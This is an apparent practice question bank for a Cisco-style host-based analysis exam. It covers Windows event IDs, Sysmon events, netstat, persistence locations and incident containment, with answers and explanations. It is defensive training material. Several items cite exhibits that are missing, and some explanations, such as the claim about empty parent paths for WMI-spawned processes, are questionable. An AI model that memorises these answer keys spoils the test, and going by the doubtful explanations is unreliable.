CCNA Host-Based Analysis Questions

46 questions · Host-Based Analysis · All types, answers revealed

1
MCQeasy

Which Windows registry hive contains user-specific configuration settings that can be modified by applications?

A.HKEY_CLASSES_ROOT
B.HKEY_LOCAL_MACHINE
C.HKEY_CURRENT_USER
D.HKEY_USERS
AnswerC

HKCU stores per-user configuration.

Why this answer

HKEY_CURRENT_USER (HKCU) is the correct answer because it stores user-specific configuration settings, such as desktop preferences, environment variables, and application settings, that are loaded from the NTUSER.DAT file when a user logs in. Applications modify this hive to persist per-user customizations, making it the primary location for user-level registry changes.

Exam trap

The trap here is that candidates confuse HKEY_CURRENT_USER with HKEY_LOCAL_MACHINE, assuming all configuration settings are system-wide, but Cisco tests the distinction that per-user application settings are stored in HKCU, not HKLM.

How to eliminate wrong answers

Option A is wrong because HKEY_CLASSES_ROOT (HKCR) stores file association and COM class registration data, not user-specific application settings. Option B is wrong because HKEY_LOCAL_MACHINE (HKLM) contains system-wide configuration settings that apply to all users and require administrative privileges to modify, not per-user settings. Option D is wrong because HKEY_USERS (HKU) contains all loaded user hives on the system, but applications typically write to the current user's hive via HKCU, which is a symbolic link to the specific user's subkey under HKU; direct modification of HKU is uncommon for application settings.

2
MCQhard

Based on the exhibit, what does the sequence of events indicate?

A.The wmiprvse.exe process is known to spawn svchost.exe for system health checks.
B.A process masquerading as svchost.exe was spawned by wmiprvse.exe (likely via WMI), and then that malicious process launched calc.exe, a suspicious behavior.
C.The user is executing a macro that opens Calculator.
D.A legitimate system process (wmiprvse.exe) launched a service host, which then launched calc.exe for maintenance.
AnswerB

The path and subsequent execution of calc.exe indicate malicious activity.

Why this answer

The exhibit shows wmiprvse.exe (the WMI Provider Host) spawning svchost.exe, which then launches calc.exe. In normal operations, wmiprvse.exe does not spawn svchost.exe; svchost.exe is a generic host process for Windows services and is typically launched by services.exe. The sequence indicates process masquerading: an attacker used WMI to execute a malicious binary named svchost.exe, which then launched calc.exe as a suspicious payload.

This is a classic indicator of lateral movement or privilege escalation via WMI.

Exam trap

Cisco often tests the misconception that svchost.exe is always legitimate and that wmiprvse.exe only spawns itself or system processes, when in fact attackers can use WMI to launch arbitrary executables with a misleading name.

How to eliminate wrong answers

Option A is wrong because wmiprvse.exe does not spawn svchost.exe for system health checks; svchost.exe is started by services.exe, and WMI does not initiate such a process for health monitoring. Option C is wrong because the exhibit shows a process chain (wmiprvse.exe → svchost.exe → calc.exe), not a user directly executing a macro; macros typically run within an Office application, not via WMI and svchost.exe. Option D is wrong because a legitimate system process (wmiprvse.exe) does not launch svchost.exe for maintenance; svchost.exe is a service host, not a maintenance tool, and calc.exe is not a standard maintenance binary.

3
MCQhard

A security analyst is reviewing host-based logs from a compromised system. The Windows Security Event Log shows multiple Event ID 4625 (failed logon) from a single source IP, but no successful logon. The network team confirms that IP is a known scanning host. What is the most likely explanation for the lack of successful logon events?

A.The brute-force attack did not succeed in gaining access
B.The logon type was interactive, which is not recorded by Event ID 4625
C.The attacker successfully logged in but the logs were deleted by the attacker
D.The attacker used a pass-the-hash technique that bypasses logon events
AnswerA

Failed logons without success indicate the attacker did not compromise the account.

Why this answer

Event ID 4625 specifically records failed logon attempts. The absence of a corresponding Event ID 4624 (successful logon) from the same source IP indicates that none of the authentication attempts succeeded. Since the network team confirms the IP belongs to a known scanning host, the most likely explanation is that the brute-force attack failed to guess valid credentials.

Exam trap

Cisco often tests the misconception that a lack of successful logon events means the logs were tampered with or that certain attack types bypass logging, when in fact the absence of Event ID 4624 alongside multiple 4625 events is the definitive indicator of a failed brute-force attack.

How to eliminate wrong answers

Option B is wrong because Event ID 4625 records all failed logon attempts regardless of logon type, including interactive, network, and remote logon types; the logon type is a field within the event, not a filter for whether the event is generated. Option C is wrong because while an attacker could delete logs after a successful login, the question explicitly states the logs show multiple Event ID 4625 events but no successful logon events; if logs were deleted, the 4625 events would likely also be missing or the deletion would be evident via Event ID 1102 (log clear). Option D is wrong because pass-the-hash attacks still generate Windows Security Event Log entries; a successful pass-the-hash logon would produce Event ID 4624 (successful logon) with Logon Type 3 (network) or 9 (new credentials), not bypass logon event generation.

4
MCQhard

A security analyst is responding to an incident on a critical Windows server that hosts a database application. The server is running Windows Server 2019 with all current patches. The analyst suspects that a remote attacker gained access and is using living-off-the-land binaries to move laterally. The analyst has captured a memory dump and a full disk image. The analyst needs to determine if the attacker used PowerShell to download additional tools. Which analysis step should the analyst perform first to identify PowerShell usage?

A.Examine the Windows Registry for Run keys to identify persistence mechanisms.
B.Parse PowerShell operational logs (Event ID 4104) to extract executed scripts and commands.
C.Review prefetch files (.pf) to determine when PowerShell was last executed.
D.Analyze network connection logs to identify outbound connections to known malicious IPs.
AnswerB

PowerShell ScriptBlock logging captures the full script content, directly showing attacker commands.

Why this answer

PowerShell operational logs, specifically Event ID 4104 (Script Block Logging), capture the full text of PowerShell scripts and commands executed on the system. Since the analyst suspects the attacker used PowerShell to download additional tools, parsing these logs is the most direct and efficient first step to confirm that activity. This log source provides the actual commands run, including any download commands like Invoke-WebRequest or Start-BitsTransfer, without relying on indirect artifacts.

Exam trap

Cisco often tests the distinction between artifacts that show execution (prefetch, registry) versus artifacts that capture the actual command or script content (PowerShell operational logs), leading candidates to choose a less direct indicator like prefetch files.

How to eliminate wrong answers

Option A is wrong because examining Windows Registry Run keys focuses on persistence mechanisms (e.g., programs that start automatically), not on identifying whether PowerShell was used to download tools during the incident. Option C is wrong because prefetch files (.pf) only show that PowerShell.exe was launched and when, but they do not reveal the specific commands or scripts executed, so they cannot confirm tool downloads. Option D is wrong because analyzing network connection logs may show outbound connections but does not directly prove PowerShell was the method used; the attacker could have used other tools or protocols, and logs may be incomplete or not capture encrypted traffic.

5
MCQmedium

A security analyst wants to monitor file creation events on a critical Windows server without installing additional software. Which Windows audit policy should be configured?

A.Audit Detailed Tracking
B.Audit File System
C.Audit Account Logon
D.Audit Process Creation
AnswerB

Audit File System logs file system operations like create, write, delete.

Why this answer

Audit File System policy is the correct choice because it specifically enables auditing of file creation, modification, and deletion events on NTFS volumes. By configuring this policy under Advanced Audit Policy in Windows, the security analyst can monitor file creation events on the critical server without requiring any third-party software, as the events are logged to the Windows Security log with Event ID 4663.

Exam trap

Cisco often tests the distinction between 'Audit File System' (file-level operations) and 'Audit Detailed Tracking' (process-level operations), causing candidates to confuse file creation with process creation events.

How to eliminate wrong answers

Option A is wrong because Audit Detailed Tracking focuses on process creation, termination, and handle duplication events (e.g., Event ID 4688), not file creation events. Option C is wrong because Audit Account Logon monitors authentication events against domain controllers or local SAM (e.g., Event ID 4624), not file system operations. Option D is wrong because Audit Process Creation logs when a process is created or starts (Event ID 4688), which does not capture file creation events on the file system.

6
MCQhard

An analyst is reviewing Sysmon logs on a Windows host and sees Event ID 1 (process creation) with a signed parent process but an unsigned child. The child has a CommandLine that includes 'powershell -EncodedCommand'. What is the most likely threat?

A.PowerShell-based malware using encoded commands to evade detection
B.Privilege escalation attempt
C.Process hollowing attack
D.Phishing email attachment
AnswerA

Encoded commands are a common obfuscation technique in PowerShell attacks.

Why this answer

Event ID 1 with a signed parent process and an unsigned child using 'powershell -EncodedCommand' strongly indicates PowerShell-based malware. Attackers use Base64-encoded commands to obfuscate malicious actions and bypass simple string-based detection, as the encoded payload is decoded and executed by PowerShell at runtime.

Exam trap

Cisco often tests the distinction between execution indicators (like encoded PowerShell commands) and other attack stages (like privilege escalation or process hollowing), leading candidates to confuse a common obfuscation technique with a different attack type.

How to eliminate wrong answers

Option B is wrong because privilege escalation typically involves exploiting vulnerabilities to gain higher privileges, not simply executing an encoded PowerShell command from a signed parent. Option C is wrong because process hollowing replaces the memory of a legitimate process with malicious code, which would not manifest as a child process with an encoded PowerShell command. Option D is wrong because a phishing email attachment is a delivery vector, not a direct threat indicator; the Sysmon log shows execution, not the initial infection method.

7
MCQeasy

A security analyst is investigating a suspected malware infection on a Windows host. The analyst wants to identify processes that have network connections. Which built-in Windows tool should the analyst use?

A.netstat
B.ipconfig
C.tasklist
D.nslookup
AnswerA

netstat shows active connections and listening ports with associated process IDs.

Why this answer

Netstat (network statistics) is the correct built-in Windows tool for displaying active TCP and UDP connections, listening ports, and the associated process IDs (PIDs). By using netstat with the `-b` or `-o` flag, the analyst can map each network connection to its owning process, which is essential for identifying suspicious processes communicating over the network.

Exam trap

Cisco often tests the distinction between tools that show process lists (tasklist) and tools that show network connections (netstat), trapping candidates who confuse 'process enumeration' with 'network connection enumeration'.

How to eliminate wrong answers

Option B (ipconfig) is wrong because it displays IP configuration details such as IP address, subnet mask, and default gateway, but it does not show active network connections or the processes using them. Option C (tasklist) is wrong because it lists running processes and their memory usage, but it does not reveal which processes have open network sockets or connections. Option D (nslookup) is wrong because it is a DNS query tool used to resolve domain names to IP addresses or perform reverse lookups, and it provides no information about local processes or their network connections.

8
Multi-Selecthard

Which TWO locations in a Linux filesystem should be checked for evidence of malware persistence?

Select 2 answers
A./proc
B./var/spool/cron/crontabs
C./var/log/syslog
D./etc/init.d
E./etc/passwd
AnswersB, D

Cron jobs can run malware periodically.

Why this answer

Option B is correct because cron is a standard Linux mechanism for scheduling recurring tasks, and malware often uses cron jobs to re-execute itself after a reboot or at specific intervals. The crontabs directory under /var/spool/cron/ contains the actual cron job files for each user, making it a primary location to check for unauthorized persistence entries. Malware can add a cron entry that downloads or runs a malicious script, ensuring its continued presence on the system.

Exam trap

Cisco often tests the distinction between locations that store persistent configuration (like crontabs and init.d) versus runtime or log-only directories (like /proc and /var/log), so candidates mistakenly choose /proc or /var/log/syslog because they are commonly examined during live analysis, but they do not hold persistence artifacts.

9
MCQmedium

A company uses Microsoft Windows Event Logging for host monitoring. The security team receives an alert from a Windows 10 workstation 'WS-102' indicating multiple failed logon attempts (Event ID 4625) within a short period from an internal IP address 10.10.10.50, followed by a successful logon (Event ID 4624) for user 'jdoe'. Shortly after, Event ID 4688 (Process Creation) shows 'cmd.exe' started by 'explorer.exe' with a command line launching 'powershell.exe -EncodedCommand ...'. The encoded command decodes to a script that attempts to download a payload from a remote server. The analyst needs to determine the most effective immediate response to limit lateral movement and impact.

A.Restore WS-102 from a known good backup and ignore the alert as a false positive.
B.Immediately reset the password for user 'jdoe', block outbound traffic to the remote server at the firewall, and initiate an incident response process.
C.Run a full antivirus scan on WS-102 and isolate it.
D.Disable the user account 'jdoe' and investigate the source IP 10.10.10.50.
AnswerB

Resets credentials, stops C2 communication, and begins formal response.

Why this answer

Option B is correct because the sequence of events—brute-force logon attempts followed by a successful logon and then an encoded PowerShell command attempting to download a payload—indicates a confirmed compromise. Resetting the password for 'jdoe' immediately revokes the attacker's authenticated access, blocking outbound traffic to the remote server prevents the payload download and C2 communication, and initiating incident response ensures proper containment and investigation. This combination directly limits lateral movement by cutting off the attacker's credentials and network egress.

Exam trap

Cisco often tests the distinction between reactive steps (like scanning or disabling accounts) and proactive containment actions that immediately cut off the attacker's access and communication channels, leading candidates to choose a less effective response that does not address both credential compromise and network egress.

How to eliminate wrong answers

Option A is wrong because restoring from backup ignores the active compromise and fails to contain the threat; the alert is not a false positive given the clear indicators of attack (failed logons, successful logon, encoded PowerShell download). Option C is wrong because running a full antivirus scan is a slow, passive step that does not immediately stop the attacker's access or the ongoing download; isolation alone does not revoke the compromised credentials or block the outbound connection to the remote server. Option D is wrong because disabling only the user account 'jdoe' does not block the outbound traffic to the remote server, allowing the payload download to complete; investigating the source IP is important but not the most effective immediate response to limit lateral movement.

10
MCQmedium

A host-based analysis tool reports that a file has a digital signature that is valid but from an untrusted publisher. What should the analyst interpret from this?

A.The file is definitely malicious because the publisher is untrusted
B.The file's signature was revoked
C.The file may be malicious or legitimate; further analysis is needed
D.The file is definitely safe because the signature is valid
AnswerC

The signature chain is technically valid, but the publisher is not trusted by default. Requires contextual analysis.

Why this answer

A valid digital signature confirms the file has not been tampered with since signing, but it does not guarantee the publisher is trustworthy. An untrusted publisher means the signing certificate is not in the system's trusted root store or has been flagged by a security policy, so the file could be either legitimate (e.g., from a new or self-signed publisher) or malicious (e.g., signed with a stolen certificate). Therefore, further analysis—such as checking the file's reputation, behavior, or origin—is required to determine its safety.

Exam trap

Cisco often tests the distinction between signature validity (cryptographic integrity) and publisher trust (certificate chain trust), leading candidates to mistakenly equate a valid signature with safety or an untrusted publisher with guaranteed malice.

How to eliminate wrong answers

Option A is wrong because a valid signature from an untrusted publisher does not automatically mean the file is malicious; the publisher may simply not be in the trusted store (e.g., a self-signed certificate). Option B is wrong because a revoked signature would be reported as invalid, not as valid but from an untrusted publisher; revocation is checked via CRL or OCSP and would cause the signature to fail verification. Option D is wrong because a valid signature does not imply safety; the publisher could be malicious or compromised, and the signature only ensures integrity, not trustworthiness.

11
Matchingmedium

Match each log severity level to its description (syslog).

Drag a concept onto its matching description — or click a concept then click the description.

Concepts
Matches

System is unusable

Immediate action required

Critical conditions

Error conditions

Warning conditions

Why these pairings

Syslog severity levels range from 0 (Emergency) to 7 (Debug).

12
MCQeasy

A financial firm uses Sysmon for endpoint monitoring on all Windows servers. One server, 'FIN-SRV-01', which hosts a critical database application, is exhibiting high CPU usage and unusual outbound network connections to a known malicious IP on port 8080. The Sysmon logs show Event ID 1 (Process Create) with a suspicious process 'rundll32.exe' spawned from 'winword.exe', and Event ID 3 (Network Connect) showing the connection to the malicious IP. The antivirus has not detected any threats. The analyst must decide the next immediate action to contain the threat while preserving evidence.

A.Reboot the server to clear any suspicious processes from memory.
B.Immediately format the server's hard drive and reinstall the OS.
C.Restore the server from the most recent backup taken yesterday.
D.Isolate the server by disconnecting its network cable and taking a memory dump for further analysis.
AnswerD

Preserves evidence and stops malicious activity.

Why this answer

Option D is correct because isolating the server by disconnecting its network cable immediately stops the outbound communication to the malicious IP on port 8080, containing the threat without destroying volatile evidence. Taking a memory dump preserves the running processes, including the suspicious rundll32.exe spawned from winword.exe, which is critical for forensic analysis of the attack chain. This approach aligns with incident response best practices: contain first, then analyze, while avoiding actions that could destroy evidence or alert the attacker.

Exam trap

Cisco often tests the principle that containment must preserve evidence, and the trap here is that candidates may choose a destructive action like rebooting or formatting, mistakenly thinking it removes the threat, when in fact it destroys the forensic data needed to understand the attack.

How to eliminate wrong answers

Option A is wrong because rebooting the server would clear the memory, destroying volatile evidence such as the running rundll32.exe process and any network connections, and would not remove the underlying persistence mechanism. Option B is wrong because immediately formatting the hard drive destroys all evidence, including logs, artifacts, and the root cause, making forensic analysis impossible and potentially violating legal or compliance requirements. Option C is wrong because restoring from a backup taken yesterday could reintroduce the same vulnerability or malware if the infection occurred before the backup, and it does not address the immediate need to stop the active outbound connection to the malicious IP.

13
MCQmedium

An analyst is investigating a host that is suspected of being compromised. She runs the 'netstat -anb' command and sees an established connection to an unknown IP address on port 4444. The associated process is svchost.exe. Which conclusion is MOST appropriate?

A.The host is definitely compromised because svchost.exe should not make outbound connections.
B.The host may be infected with malware that is injecting code into svchost.exe.
C.The analyst should immediately kill the svchost.exe process.
D.The connection is legitimate because svchost.exe is a critical Windows process.
AnswerB

Malware often injects into svchost.exe to hide its network activity.

Why this answer

Option B is correct because svchost.exe is a legitimate Windows service host process, but it is a common target for malware that uses process injection or DLL sideloading to hide malicious network activity. The established connection to an unknown IP on port 4444 (often associated with Metasploit or backdoor listeners) indicates the process may be hosting injected code, not that svchost.exe itself is inherently malicious. The analyst should investigate further before concluding compromise or taking action.

Exam trap

Cisco often tests the misconception that svchost.exe never makes outbound connections, when in fact many Windows services (e.g., BITS, Windows Update) do; the trap is assuming any outbound connection from a critical process is automatically legitimate or automatically malicious without considering the port and context.

How to eliminate wrong answers

Option A is wrong because svchost.exe can make legitimate outbound connections for Windows services like DNS, DHCP, or Windows Update, so an outbound connection alone does not prove compromise. Option C is wrong because killing svchost.exe could crash critical system services and disrupt the investigation; the analyst should first capture memory and network artifacts to identify the injected code. Option D is wrong because while svchost.exe is a critical Windows process, an established connection to an unknown IP on port 4444 is highly suspicious and should not be dismissed as legitimate without further analysis.

14
Drag & Dropmedium

Drag and drop the steps to investigate a security incident using a SIEM into the correct order.

Drag steps to the numbered slots on the right, or tap a step then tap a slot.

Steps
Order

Why this order

Incident investigation: identify, collect, analyze, contain, document.

15
Matchingmedium

Match each Windows event log type to its description.

Drag a concept onto its matching description — or click a concept then click the description.

Concepts
Matches

Logs success/failure audit events

Logs operating system events

Logs events from applications

Logs installation events

Logs events forwarded from other computers

Why these pairings

These are standard Windows Event Log categories.

16
MCQmedium

Based on the exhibit, what is the most likely conclusion about the host's security state?

A.The svchost.exe process on UDP port 4444 indicates a Windows service that should be monitored.
B.The established TCP connection to 203.0.113.5 indicates data exfiltration to a known malicious IP.
C.The host is running a legitimate remote administration tool on port 4444.
D.The host has a backdoor listening on UDP port 4444, and the established connection suggests an active command session via cmd.exe.
AnswerD

The combination of UDP listener and cmd.exe connection to external IP is highly suspicious.

Why this answer

The exhibit shows svchost.exe listening on UDP port 4444, which is unusual because svchost.exe typically hosts Windows services over TCP or named pipes, not raw UDP. Additionally, an established TCP connection to 203.0.113.5 with cmd.exe as the associated process indicates an active command shell session, which is a classic sign of a backdoor. The combination of a non-standard UDP listener and an active cmd.exe connection strongly suggests the host is compromised with a backdoor providing remote command execution.

Exam trap

Cisco often tests the misconception that svchost.exe is always legitimate, but the trap here is that a UDP listener on port 4444 combined with an established cmd.exe connection is a definitive indicator of a backdoor, not a normal Windows service or remote admin tool.

How to eliminate wrong answers

Option A is wrong because svchost.exe does not natively listen on UDP port 4444; legitimate Windows services use well-known ports (e.g., 135, 445) over TCP, and a UDP listener on 4444 is anomalous and indicative of malware masquerading as a system process. Option B is wrong because while the TCP connection to 203.0.113.5 is suspicious, the exhibit does not provide evidence that this IP is known malicious or that data exfiltration is occurring; the primary indicator is the cmd.exe process tied to the connection, suggesting an interactive shell rather than bulk data transfer. Option C is wrong because legitimate remote administration tools (e.g., RDP on 3389, SSH on 22) do not use UDP port 4444, and svchost.exe is not a legitimate remote administration binary; the presence of cmd.exe on the established connection confirms an unauthorized command session.

17
Multi-Selecteasy

A security analyst is investigating a host that is suspected of being compromised. The analyst runs a series of commands to gather information. Which TWO of the following commands are most useful for collecting volatile data from a live Windows system? (Choose two.)

Select 2 answers
A.netstat -anob
B.tasklist /svc
C.dir /s C:\Windows\System32\config
D.wevtutil qe System /c:10
E.reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
AnswersA, B

Shows active network connections with associated process IDs and executables.

Why this answer

The `netstat -anob` command displays active network connections, listening ports, and the associated process IDs (PIDs) along with the executable name. This is critical for identifying unauthorized outbound connections or backdoor listeners that indicate compromise. Because network state and process-to-port mappings reside in volatile memory (RAM), they are lost on reboot, making this command essential for live forensic collection.

Exam trap

Cisco often tests the distinction between volatile (memory-resident) and non-volatile (disk-based) data, and the trap here is that candidates mistakenly treat registry queries or event log exports as volatile because they are commonly used in live response, when in fact they read persistent disk artifacts.

18
MCQhard

During a host-based analysis of a Windows system, an analyst finds that the Windows Event ID 4688 (process creation) logs show a child process spawning from a legitimate application, but the parent process path is empty. What does this likely indicate?

A.The parent process was terminated immediately after spawning
B.The process was spawned via a WMI call without a parent path
C.The event log is corrupted
D.The process is a kernel thread
AnswerB

WMI spawns often result in empty parent path fields.

Why this answer

When a process is spawned via Windows Management Instrumentation (WMI), the parent process path is often empty in Event ID 4688 logs because WMI creates the child process in a way that does not preserve the standard parent-child relationship. This occurs because WMI uses the `Win32_Process.Create` method, which runs under the WMI provider host process (WmiPrvSE.exe) but does not populate the parent process path field in the security log. The empty parent path is a strong indicator of WMI-based process creation, which is commonly used for lateral movement or persistence by attackers.

Exam trap

Cisco often tests the misconception that an empty parent path indicates log corruption or a terminated parent, but the correct interpretation is that WMI-based process creation deliberately omits the parent path in Event ID 4688.

How to eliminate wrong answers

Option A is wrong because if the parent process were terminated immediately after spawning, the parent process ID (PPID) would still be recorded in the event log, and the parent process path would not be empty—it would show the path of the terminated process. Option C is wrong because event log corruption would typically manifest as missing events, garbled data, or error codes, not as a consistently empty parent process path for a specific event type. Option D is wrong because kernel threads are not user-mode processes and do not generate Event ID 4688 logs; they are managed by the kernel and appear in different log sources or not at all.

19
MCQeasy

A SOC analyst is investigating a suspicious file on a Windows host. The file hash matches a known malware variant in a threat intelligence feed. What is the next best step for host-based analysis?

A.Run a full antivirus scan on the host
B.Disable the network adapter to prevent further communication
C.Check for persistence mechanisms such as registry Run keys or scheduled tasks
D.Reboot the host to clear the malware from memory
AnswerC

Malware often adds persistence. Examining startup locations helps determine scope and removal.

Why this answer

Option C is correct because after confirming a file hash matches a known malware variant, the immediate priority for host-based analysis is to determine how the malware maintains persistence on the system. Persistence mechanisms such as Registry Run keys (e.g., HKCU\Software\Microsoft\Windows\CurrentVersion\Run) or scheduled tasks (via schtasks.exe) allow malware to survive reboots and re-establish execution. Identifying these artifacts is critical for containment and eradication, as it reveals the malware's foothold and prevents re-infection after removal.

Exam trap

Cisco often tests the distinction between host-based analysis (focusing on local artifacts like persistence, processes, and registry) and network-based containment (like disabling adapters), so candidates mistakenly choose network isolation steps when the question explicitly asks for host-based analysis.

How to eliminate wrong answers

Option A is wrong because running a full antivirus scan is reactive and may not detect the specific malware variant if signatures are outdated or if the malware employs evasion techniques like packing or polymorphism; the hash match already confirms maliciousness, so scanning adds no new forensic value. Option B is wrong because disabling the network adapter is a network-based containment step, not a host-based analysis step; while it may prevent C2 communication, the question specifically asks for the next best step in host-based analysis, which should focus on understanding the malware's local impact and persistence. Option D is wrong because rebooting the host may clear malware from memory (e.g., fileless malware), but it destroys volatile evidence such as running processes, network connections, and memory-resident artifacts, and it does not address persistence mechanisms that would cause the malware to reload on startup.

20
MCQeasy

An analyst needs to review the Windows event logs from a host to determine if a user's account was used to log in at an unusual time. Which log type should the analyst check?

A.Application
B.System
C.Setup
D.Security
AnswerD

Security log records logon/logoff events.

Why this answer

The Security log in Windows Event Viewer records audit events, including successful and failed logon attempts (Event ID 4624 for successful logons). This log type is the correct source for determining if a user's account was used to log in at an unusual time, as it captures the timestamp and details of each authentication event.

Exam trap

Cisco often tests the distinction between the Security log (which records authentication events) and the System log (which records system-level events), leading candidates to mistakenly choose the System log for logon analysis.

How to eliminate wrong answers

Option A is wrong because the Application log records events from applications and programs, not authentication or logon activities. Option B is wrong because the System log records events from Windows system components (e.g., driver failures, service starts), not user logon events. Option C is wrong because the Setup log records events related to Windows installation and updates, not user authentication or logon activity.

21
MCQhard

A company's security team is investigating an alert from their EDR platform indicating that a workstation in the finance department has been making repeated connections to an external IP address associated with a known command-and-control (C2) server. The analyst has isolated the host from the network and is performing host-based analysis. The host is running Windows 10 with Sysmon deployed and Windows Event Logging enabled. The analyst reviews Sysmon events and finds: - Event ID 1 (Process Creation): 'powershell.exe -NoP -NonI -W Hidden -Enc JABzAD0ATgBlAHcALQBPAEI ...' (long encoded string) - Event ID 3 (Network Connect): powershell.exe connecting to the C2 IP on port 443 (HTTPS), and also to an internal IP on port 445 (SMB). - Event ID 11 (FileCreate): a file created at C:\Users\financeuser\AppData\Roaming\Microsoft\svchost.exe (size 512KB) with no signature. - Event ID 7 (Image Load): svchost.exe (from AppData) loaded 'crypt32.dll'. - Event ID 8 (CreateRemoteThread): not observed. The analyst also checks the Windows Security log and finds Event ID 4624 (Success Logon) for the user 'financeuser' from a remote workstation at 2:00 AM, which is outside normal hours. The workstation is part of the Active Directory domain. The analyst needs to determine the most effective next step to contain the threat and prevent recurrence.

A.Isolate the host further by blocking all inbound and outbound traffic via the host firewall, then perform memory acquisition and deep forensic analysis before remediation.
B.Remove the malicious svchost.exe file and kill the powershell process, then run a full antivirus scan.
C.Power off the workstation and reimage it immediately, then reset the user's password.
D.Change the user's password, revoke all Kerberos tickets, and check for lateral movement using the SMB connection observed.
AnswerD

The SMB connection suggests lateral movement; resetting credentials and revoking tickets prevents further abuse of the account.

Why this answer

Option D is correct because the SMB connection (port 445) to an internal IP strongly indicates lateral movement via techniques like PsExec or scheduled tasks. Changing the user's password and revoking Kerberos tickets (e.g., using `klist -li 0x3e7 purge`) immediately cuts off the attacker's authenticated access, while checking for lateral movement addresses the broader compromise. This aligns with the NIST incident response containment phase, prioritizing credential and token revocation over file deletion or reimaging alone.

Exam trap

Cisco often tests the distinction between host-level containment (e.g., deleting files) and domain-level containment (e.g., credential revocation), where candidates mistakenly choose a simple file removal or reimage without addressing the broader authentication compromise indicated by the SMB connection and off-hours logon.

How to eliminate wrong answers

Option A is wrong because the host is already isolated from the network; further firewall blocking is redundant, and memory acquisition is a forensic step, not containment. Option B is wrong because simply removing the file and killing the process does not address the compromised credentials or potential lateral movement via SMB; the attacker could re-authenticate or have already moved to other hosts. Option C is wrong because powering off and reimaging destroys volatile evidence and does not revoke the attacker's access via Kerberos tickets or changed passwords, allowing them to persist in the domain.

22
MCQmedium

A company's endpoint detection and response (EDR) agent is reporting a file that was created with a name matching a known ransomware pattern. The analyst suspects the file is malicious. What is the best first step to contain the threat?

A.Create a new firewall rule
B.Isolate the host from the network
C.Run a full antivirus scan
D.Delete the file
AnswerB

Isolation prevents lateral movement and C2 communication.

Why this answer

Isolating the host from the network is the best first step because it immediately stops the ransomware from communicating with its command-and-control (C2) server and prevents lateral movement to other systems. The EDR agent has already flagged the file as suspicious, so the priority is containment, not further analysis or deletion, which could trigger the ransomware to encrypt data. Network isolation breaks the attack chain at the host level, buying time for forensic analysis and remediation.

Exam trap

Cisco often tests the principle of 'containment before eradication' — the trap here is that candidates choose to delete the file or run a scan, thinking that removing the artifact stops the threat, but they overlook that the ransomware may already be executing in memory or have established persistence.

How to eliminate wrong answers

Option A is wrong because creating a new firewall rule is a network-level control that takes time to implement and may not block all outbound traffic from the already-compromised host, especially if the ransomware uses dynamic ports or encrypted tunnels. Option C is wrong because running a full antivirus scan is a detection and remediation step that occurs after containment; the file is already suspected malicious, and scanning could trigger the ransomware to execute and encrypt files. Option D is wrong because deleting the file without first isolating the host may not stop the ransomware if it is already running in memory, and it could also trigger a failsafe mechanism that encrypts data immediately.

23
MCQmedium

An organization uses Windows 10 Enterprise workstations with standard user accounts (no local admin). Users run daily tasks including web browsing, document editing, and accessing a corporate intranet. Recently, the security team detected anomalous outbound traffic from one workstation to an IP address in a foreign country. The workstation's host-based firewall shows that a process named 'svch0st.exe' initiated the connection. Additionally, a scheduled task named 'UpdateTask' runs every hour with SYSTEM privileges, executing a script from a hidden folder. The user reports no unusual behavior except occasional system slowdowns. The analyst must determine the best immediate course of action. Which action should the analyst take first?

A.Run an antivirus scan and if nothing is found, ignore the alert as a false positive
B.Immediately disconnect the workstation from the network and perform a full system restore from a known good backup
C.Delete the scheduled task and the script from the hidden folder, then reboot the workstation
D.Disable the scheduled task and terminate the svch0st.exe process, then collect a forensic image of the workstation for further analysis
AnswerD

This stops malicious activity while preserving the script and other evidence on disk for later analysis.

Why this answer

Option D is correct because the immediate priority is to contain the threat by disabling the scheduled task and terminating the malicious process (svch0st.exe) to stop further outbound communication, while preserving the system state for forensic analysis. Collecting a forensic image ensures that evidence (e.g., the script, scheduled task artifacts, and network logs) is not destroyed, allowing the security team to perform root-cause analysis and determine the full scope of the compromise. This approach balances containment with evidence preservation, which is critical in incident response.

Exam trap

Cisco often tests the distinction between containment (stopping the active threat) and eradication (removing files), where candidates mistakenly choose to delete artifacts immediately (Option C) instead of first containing the process and preserving evidence for analysis.

How to eliminate wrong answers

Option A is wrong because relying solely on an antivirus scan is insufficient; the process 'svch0st.exe' mimics legitimate 'svchost.exe' and may evade signature-based detection, and ignoring the alert could allow persistent access. Option B is wrong because immediately disconnecting and restoring from backup destroys volatile evidence (e.g., running processes, memory contents, and scheduled task details) needed for forensic analysis, and may not remove the threat if the backup is also compromised. Option C is wrong because deleting the scheduled task and script without first containing the active process (svch0st.exe) allows the malware to continue running and potentially re-establish persistence or exfiltrate data; also, rebooting may destroy evidence in memory.

24
MCQeasy

Refer to the exhibit. An analyst runs the command 'tasklist /svc /fi "PID eq 1234"' on a Windows host and receives the output shown. Which conclusion can the analyst draw from this output?

A.The process is a third-party application
B.The process is using excessive CPU resources
C.The process is a legitimate Windows service host
D.The process is likely malware masquerading as svchost.exe
AnswerC

svchost.exe is a legitimate Windows process that hosts multiple system services.

Why this answer

The 'tasklist /svc /fi "PID eq 1234"' command filters for a specific PID and displays the associated services. The output shows 'svchost.exe' with the service 'DcomLaunch', which is a core Windows component responsible for launching COM and DCOM services. This confirms the process is a legitimate Windows service host, not a third-party application or malware.

Exam trap

Cisco often tests the misconception that any svchost.exe process is suspicious or malware, but the key is to recognize that legitimate svchost.exe instances host specific Windows services and are identified by their associated service names and standard system paths.

How to eliminate wrong answers

Option A is wrong because the output shows 'svchost.exe', which is a native Windows system binary, not a third-party application. Option B is wrong because the 'tasklist /svc' command does not display CPU usage; it only shows process name, PID, and associated services, so no conclusion about CPU resource consumption can be drawn. Option D is wrong because while malware can masquerade as svchost.exe, the presence of the legitimate 'DcomLaunch' service and the process running from the standard 'C:\Windows\System32' directory (implied by the output) strongly indicates it is not masquerading; a masquerading process would typically not have the correct service association or path.

25
MCQhard

Refer to the exhibit. A host-based analysis tool outputs a JSON report. Which persistence mechanism is being used?

A.Windows Service
B.Startup Folder
C.Registry Run Key
D.Scheduled Task
AnswerC

The HKLM...Run key is a common startup persistence location.

Why this answer

The JSON report shows a registry key modification under `HKLM\Software\Microsoft\Windows\CurrentVersion\Run`, which is a standard Registry Run Key. This key automatically launches the specified executable (`C:\Users\malware\app.exe`) at user logon, making it a persistence mechanism. The `"Value":"C:\\Users\\malware\\app.exe"` confirms the payload path, and the key name `"MaliciousService"` is irrelevant to the actual mechanism.

Exam trap

Cisco often tests the distinction between registry-based persistence (Run keys) and service-based persistence, where candidates mistakenly associate the word 'Service' in a key name with a Windows Service, but the actual mechanism is determined by the registry path, not the value name.

